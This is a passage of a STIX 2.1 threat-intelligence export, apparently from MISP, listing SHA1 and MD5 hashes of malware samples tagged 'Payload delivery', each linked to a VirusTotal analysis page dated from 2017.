|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db826c-424c-4cf5-b6e8-416a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:20.000Z",
|
|
"modified": "2017-03-29T09:46:20.000Z",
|
|
"description": "- Xchecked via VT: 0bf94cbf7120ba5810c24772ba9752d22a31129cbed2009ebbed5bce18c916d5",
|
|
"pattern": "[file:hashes.SHA1 = '383fff2d997facc5d32b2dd0b7b7d01182188fd6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:20Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db826d-bcc8-4126-83c8-412f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:21.000Z",
|
|
"modified": "2017-03-29T09:46:21.000Z",
|
|
"description": "- Xchecked via VT: 0bf94cbf7120ba5810c24772ba9752d22a31129cbed2009ebbed5bce18c916d5",
|
|
"pattern": "[file:hashes.MD5 = 'c241e29ad08340c76927cba6f5493ec4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:21Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db826e-f094-4e9c-9ac5-4e5802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:22.000Z",
|
|
"modified": "2017-03-29T09:46:22.000Z",
|
|
"first_observed": "2017-03-29T09:46:22Z",
|
|
"last_observed": "2017-03-29T09:46:22Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db826e-f094-4e9c-9ac5-4e5802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db826e-f094-4e9c-9ac5-4e5802de0b81",
|
|
"value": "https://www.virustotal.com/file/0bf94cbf7120ba5810c24772ba9752d22a31129cbed2009ebbed5bce18c916d5/analysis/1440970138/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db826f-e698-490e-b4de-477b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:23.000Z",
|
|
"modified": "2017-03-29T09:46:23.000Z",
|
|
"description": "- Xchecked via VT: a60c52336dc58251b28fba6345f75236bd7cf82c19702fa777fc926f04a5f75f",
|
|
"pattern": "[file:hashes.SHA1 = '77b2f5f9f027ac04aaefc29845fa3d3ef0902a22']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:23Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8270-0d10-4953-ae4b-423502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:24.000Z",
|
|
"modified": "2017-03-29T09:46:24.000Z",
|
|
"description": "- Xchecked via VT: a60c52336dc58251b28fba6345f75236bd7cf82c19702fa777fc926f04a5f75f",
|
|
"pattern": "[file:hashes.MD5 = '8b640d8b9cec2b31ad778f718c273fef']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:24Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8271-bc84-45a8-9fc2-42b002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:25.000Z",
|
|
"modified": "2017-03-29T09:46:25.000Z",
|
|
"first_observed": "2017-03-29T09:46:25Z",
|
|
"last_observed": "2017-03-29T09:46:25Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8271-bc84-45a8-9fc2-42b002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8271-bc84-45a8-9fc2-42b002de0b81",
|
|
"value": "https://www.virustotal.com/file/a60c52336dc58251b28fba6345f75236bd7cf82c19702fa777fc926f04a5f75f/analysis/1424248172/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8272-ea08-494c-bc96-443302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:26.000Z",
|
|
"modified": "2017-03-29T09:46:26.000Z",
|
|
"description": "- Xchecked via VT: 35074e717332d8fe3336448c8cf065bab56b978819b4685e618b094674be06df",
|
|
"pattern": "[file:hashes.SHA1 = 'e82f929b175b1beded3b8b9f7ab4737829a36095']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:26Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8272-9220-4217-ac8b-402e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:26.000Z",
|
|
"modified": "2017-03-29T09:46:26.000Z",
|
|
"description": "- Xchecked via VT: 35074e717332d8fe3336448c8cf065bab56b978819b4685e618b094674be06df",
|
|
"pattern": "[file:hashes.MD5 = 'ef482c89506408e4cbf5bea9f65906c8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:26Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8273-86dc-43e0-af7a-4d1102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:27.000Z",
|
|
"modified": "2017-03-29T09:46:27.000Z",
|
|
"first_observed": "2017-03-29T09:46:27Z",
|
|
"last_observed": "2017-03-29T09:46:27Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8273-86dc-43e0-af7a-4d1102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8273-86dc-43e0-af7a-4d1102de0b81",
|
|
"value": "https://www.virustotal.com/file/35074e717332d8fe3336448c8cf065bab56b978819b4685e618b094674be06df/analysis/1430064826/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8274-dc3c-441b-89de-453602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:28.000Z",
|
|
"modified": "2017-03-29T09:46:28.000Z",
|
|
"description": "- Xchecked via VT: cc8585b57a9a371fb6d7250395bdcddca07150a7dd97c3a9dd67e408812feb8e",
|
|
"pattern": "[file:hashes.SHA1 = '646544ed0494eafcefaa0ae3accfaf5d724b05b5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:28Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8275-a7b4-40f6-9a6d-426a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:29.000Z",
|
|
"modified": "2017-03-29T09:46:29.000Z",
|
|
"description": "- Xchecked via VT: cc8585b57a9a371fb6d7250395bdcddca07150a7dd97c3a9dd67e408812feb8e",
|
|
"pattern": "[file:hashes.MD5 = 'e7cb04f497eb3bd9717ecab58050f7d8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:29Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8276-5690-4807-82e0-455d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:30.000Z",
|
|
"modified": "2017-03-29T09:46:30.000Z",
|
|
"first_observed": "2017-03-29T09:46:30Z",
|
|
"last_observed": "2017-03-29T09:46:30Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8276-5690-4807-82e0-455d02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8276-5690-4807-82e0-455d02de0b81",
|
|
"value": "https://www.virustotal.com/file/cc8585b57a9a371fb6d7250395bdcddca07150a7dd97c3a9dd67e408812feb8e/analysis/1475999305/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8277-deec-4344-acf3-4e7702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:31.000Z",
|
|
"modified": "2017-03-29T09:46:31.000Z",
|
|
"description": "- Xchecked via VT: 7b23f7c1ca90affc891ac89d6c9b592e0c47f1a539b9e8a87f6431fc0158404f",
|
|
"pattern": "[file:hashes.SHA1 = '2ecd7cf25308d1bfa991cfba9a72c88ab88a4515']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:31Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8278-6894-4b8f-92a5-46e502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:32.000Z",
|
|
"modified": "2017-03-29T09:46:32.000Z",
|
|
"description": "- Xchecked via VT: 7b23f7c1ca90affc891ac89d6c9b592e0c47f1a539b9e8a87f6431fc0158404f",
|
|
"pattern": "[file:hashes.MD5 = 'f483fa889bbc126100c58185a38d6893']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8279-1128-4ce1-9708-418f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:33.000Z",
|
|
"modified": "2017-03-29T09:46:33.000Z",
|
|
"first_observed": "2017-03-29T09:46:33Z",
|
|
"last_observed": "2017-03-29T09:46:33Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8279-1128-4ce1-9708-418f02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8279-1128-4ce1-9708-418f02de0b81",
|
|
"value": "https://www.virustotal.com/file/7b23f7c1ca90affc891ac89d6c9b592e0c47f1a539b9e8a87f6431fc0158404f/analysis/1426178931/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db827a-4860-4086-9c04-4f4702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:34.000Z",
|
|
"modified": "2017-03-29T09:46:34.000Z",
|
|
"description": "- Xchecked via VT: 10b8eaae1e00dfb40186a1d32f0c3cc10a47b9258afbbbdd81569b96b2c79a07",
|
|
"pattern": "[file:hashes.SHA1 = '83a153d50d467589e42108c2d1b44952ab6f0c61']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:34Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db827b-048c-441f-9dbe-44cc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:35.000Z",
|
|
"modified": "2017-03-29T09:46:35.000Z",
|
|
"description": "- Xchecked via VT: 10b8eaae1e00dfb40186a1d32f0c3cc10a47b9258afbbbdd81569b96b2c79a07",
|
|
"pattern": "[file:hashes.MD5 = 'c3b00e60af4af3e786e7a82c391a9b2a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db827c-ee3c-4d28-b530-4b4a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:36.000Z",
|
|
"modified": "2017-03-29T09:46:36.000Z",
|
|
"first_observed": "2017-03-29T09:46:36Z",
|
|
"last_observed": "2017-03-29T09:46:36Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db827c-ee3c-4d28-b530-4b4a02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db827c-ee3c-4d28-b530-4b4a02de0b81",
|
|
"value": "https://www.virustotal.com/file/10b8eaae1e00dfb40186a1d32f0c3cc10a47b9258afbbbdd81569b96b2c79a07/analysis/1430085385/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db827c-bb2c-4b67-aca8-422802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:36.000Z",
|
|
"modified": "2017-03-29T09:46:36.000Z",
|
|
"description": "- Xchecked via VT: 0a46ce6d1d54fed2b200622ad0d5977e00e7865fe26c4cc69efa573e1ae542ad",
|
|
"pattern": "[file:hashes.SHA1 = 'df0291d5ba48b7f54fbb599d1e89baf94c542719']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:36Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db827d-31ec-4f8a-8d9a-407202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:37.000Z",
|
|
"modified": "2017-03-29T09:46:37.000Z",
|
|
"description": "- Xchecked via VT: 0a46ce6d1d54fed2b200622ad0d5977e00e7865fe26c4cc69efa573e1ae542ad",
|
|
"pattern": "[file:hashes.MD5 = 'ac089b67708c6261ff6f2e0189ad11cd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db827e-7528-426e-8d6c-432802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:38.000Z",
|
|
"modified": "2017-03-29T09:46:38.000Z",
|
|
"first_observed": "2017-03-29T09:46:38Z",
|
|
"last_observed": "2017-03-29T09:46:38Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db827e-7528-426e-8d6c-432802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db827e-7528-426e-8d6c-432802de0b81",
|
|
"value": "https://www.virustotal.com/file/0a46ce6d1d54fed2b200622ad0d5977e00e7865fe26c4cc69efa573e1ae542ad/analysis/1434010761/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db827f-d314-4138-889d-417902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:39.000Z",
|
|
"modified": "2017-03-29T09:46:39.000Z",
|
|
"description": "- Xchecked via VT: b857f5244e18fa9efc9b820dc70b827674f28bcea9ab7ef666e2271f0de4c9ef",
|
|
"pattern": "[file:hashes.SHA1 = '125bf148d26110c5c3f8541f722565b9e9123b9b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:39Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8280-33e0-4728-a21a-45b602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:40.000Z",
|
|
"modified": "2017-03-29T09:46:40.000Z",
|
|
"description": "- Xchecked via VT: b857f5244e18fa9efc9b820dc70b827674f28bcea9ab7ef666e2271f0de4c9ef",
|
|
"pattern": "[file:hashes.MD5 = 'a0eff4f10b0dc2cf0a0403114728ab62']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8281-6054-4cb9-8efd-446902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:41.000Z",
|
|
"modified": "2017-03-29T09:46:41.000Z",
|
|
"first_observed": "2017-03-29T09:46:41Z",
|
|
"last_observed": "2017-03-29T09:46:41Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8281-6054-4cb9-8efd-446902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8281-6054-4cb9-8efd-446902de0b81",
|
|
"value": "https://www.virustotal.com/file/b857f5244e18fa9efc9b820dc70b827674f28bcea9ab7ef666e2271f0de4c9ef/analysis/1469649858/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8282-8d10-4637-af09-4cb702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:42.000Z",
|
|
"modified": "2017-03-29T09:46:42.000Z",
|
|
"description": "Associated sample - Xchecked via VT: bf4b6f9f28166c0c6916548694a09f98ab5e4e9c3012323b3a5fb3e6a6b33d9e",
|
|
"pattern": "[file:hashes.SHA1 = '08e11555f59d91e7b8fd2f13640d0bbfd5808dc0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:42Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8283-8280-4c78-b4f8-46a002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:43.000Z",
|
|
"modified": "2017-03-29T09:46:43.000Z",
|
|
"description": "Associated sample - Xchecked via VT: bf4b6f9f28166c0c6916548694a09f98ab5e4e9c3012323b3a5fb3e6a6b33d9e",
|
|
"pattern": "[file:hashes.MD5 = '7a41293e547b51715138dc1489a5bccd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:43Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8284-60a0-4318-b08f-47f502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:44.000Z",
|
|
"modified": "2017-03-29T09:46:44.000Z",
|
|
"first_observed": "2017-03-29T09:46:44Z",
|
|
"last_observed": "2017-03-29T09:46:44Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8284-60a0-4318-b08f-47f502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8284-60a0-4318-b08f-47f502de0b81",
|
|
"value": "https://www.virustotal.com/file/bf4b6f9f28166c0c6916548694a09f98ab5e4e9c3012323b3a5fb3e6a6b33d9e/analysis/1433768509/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8285-2a70-40a5-b4a3-4d8f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:45.000Z",
|
|
"modified": "2017-03-29T09:46:45.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 302b0b3731f86facb6be3fbe8eadf18d00d696175fc1590fc012b9c90fd60de6",
|
|
"pattern": "[file:hashes.SHA1 = 'e466bc38802c5f6b21653605ef54bbaa77554ae0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:45Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8286-b2cc-45d6-b77f-4b3102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:46.000Z",
|
|
"modified": "2017-03-29T09:46:46.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 302b0b3731f86facb6be3fbe8eadf18d00d696175fc1590fc012b9c90fd60de6",
|
|
"pattern": "[file:hashes.MD5 = '3512c3f084e9f66596dcc80ca9028be4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8287-6950-4a24-aab0-4c4c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:47.000Z",
|
|
"modified": "2017-03-29T09:46:47.000Z",
|
|
"first_observed": "2017-03-29T09:46:47Z",
|
|
"last_observed": "2017-03-29T09:46:47Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8287-6950-4a24-aab0-4c4c02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8287-6950-4a24-aab0-4c4c02de0b81",
|
|
"value": "https://www.virustotal.com/file/302b0b3731f86facb6be3fbe8eadf18d00d696175fc1590fc012b9c90fd60de6/analysis/1439759479/"
|
|
},
|
|
{
|
|
